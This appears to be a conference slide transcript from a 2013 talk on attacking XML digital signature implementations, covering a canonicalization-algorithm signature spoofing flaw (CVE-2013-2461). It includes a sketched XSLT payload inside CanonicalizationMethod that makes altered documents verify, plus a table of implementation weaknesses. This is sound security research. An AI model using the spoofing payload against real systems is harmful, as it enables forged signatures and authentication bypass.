2172/CVE-2013-2461
• Signature Spoofing through
Canonicalization Algorithm Identifier
• Affected .NET, Apache Java and JRE
• Doesn't work in Mono, due to an "Incompatible Implementation"
![Page 110: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/110.jpg)
<SignedInfo><CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference URI="">
<Transforms><Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo>
SignedInfo Element
![Page 111: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/111.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><Reference URI="">
<Transforms> <Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><DigestValue>C2pG...</DigestValue>
</Reference> </SignedInfo>
SignedInfo Element
![Page 112: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/112.jpg)
<SignedInfo><CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/><SignatureMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> <Reference URI="">
<Transforms> <Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> </Transforms> <DigestMethod
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/> <DigestValue>C2pG...</DigestValue>
</Reference> </SignedInfo>
SignedInfo Element
![Page 113: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/113.jpg)
Algorithm IdentifiersName Type URI Required?
SHA1 Digest http://www.w3.org/2000/09/xmldsig#sha1 Yes
Base64 Encoding http://www.w3.org/2000/09/xmldsig#base64 Yes
HMAC/SHA1 Signature http://www.w3.org/2000/09/xmldsig#hmac-sha1 Yes
DSA/SHA1 Signature http://www.w3.org/2000/09/xmldsig#dsa-sha1 Yes
RSA/SHA1 Signature http://www.w3.org/2000/09/xmldsig#rsa-sha1 No
C14N 1.0 C14N http://www.w3.org/TR/2001/REC-xml-c14n-20010315
Yes
C14N 1.1 C14N http://www.w3.org/2006/12/xml-c14n11 Yes
Envelope Transform http://www.w3.org/2000/09/xmldsig#enveloped-signature
Yes
XPath Transform http://www.w3.org/TR/1999/REC-xpath-19991116 No
XSLT Transform http://www.w3.org/TR/1999/REC-xslt-19991116 No
![Page 114: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/114.jpg)
Extensible?
http://www.w3.org/TR/xmldsig-core/#sec-AlgID
"This specification defines a set of algorithms, their URIs,
and requirements for implementation. Requirements
are specified over implementation, not over
requirements for signature use. Furthermore, the
mechanism is extensible; alternative algorithms may
be used by signature applications."
![Page 115: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/115.jpg)
Creating .NET Canonicalizer
class SignedInfo{
public string CanonicalizationMethod { get; }
public Transform CanonicalizationMethodObject{
get {
return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);}
} }
![Page 116: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/116.jpg)
Creating .NET Canonicalizer
class SignedInfo{
public string CanonicalizationMethod { get; }
public Transform CanonicalizationMethodObject{
get {
return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);}
} }
![Page 117: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/117.jpg)
CryptoConfig?
![Page 118: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/118.jpg)
CryptoConfig?
![Page 119: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/119.jpg)
Derived from Transform
![Page 120: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/120.jpg)
Derived from Transform
![Page 121: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/121.jpg)
Derived from Transform
![Page 122: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/122.jpg)
Derived from Transform
![Page 123: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/123.jpg)
Derived from Transform
![Page 124: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/124.jpg)
Derived from Transform
![Page 125: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/125.jpg)
Exploiting It
Extract
Good Signed XML Document
<good/><SignedInfo>
<CanonicalizationMethod/><SignatureMethod/><Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>C2pG...</DigestValue>
</Reference></SignedInfo>
Canonicalize
<xsl:stylesheet version="1.0"><xsl:output method="text" /><xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...</xsl:text>
</xsl:template></xsl:stylesheet>
To X
SLT
Modify Document
Bad Signed XML Document
<bad/>
![Page 126: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/126.jpg)
Final XML
<SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" /><xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...
</xsl:text></xsl:template>
</xsl:stylesheet></CanonicalizationMethod><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
</SignedInfo>
![Page 127: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/127.jpg)
And the Rest
• Cross Implementation DoS (can't show
at this time).
– Also allows you to steal files
• Invalid Parsing of Signatures
– Blended Threat between parsers
• Other DoS stuff in .NET and WCF
• Many Lucky "bugs" in Mono
![Page 128: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/128.jpg)
Final Score Sheet
Implementation ParsingIssues
Memory Corruption
Signature Spoofing
Denial of Service
File Stealing
Apache C++ Yes Yes Yes Yes Yes, hilariously!
Apache Java/JRE Yes No Yes Yes Sort of, limited use
XMLSEC1 No No Yes Yes if libxml2 isn't
fixed
No
.NET No No Yes Yes Yes
Mono Lucky Escape
No Yes, should have been
worse
Yes I gave up even trying
![Page 129: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/129.jpg)
Demo Time!
![Page 130: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/130.jpg)
Conclusions
• Don't Blindly Trust Your Implementation
• Double Check All References are as
expected
• Double Check All Algorithms are as
expected
• Probably stay away from Apache C++ and Mono
![Page 131: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/131.jpg)
Questions?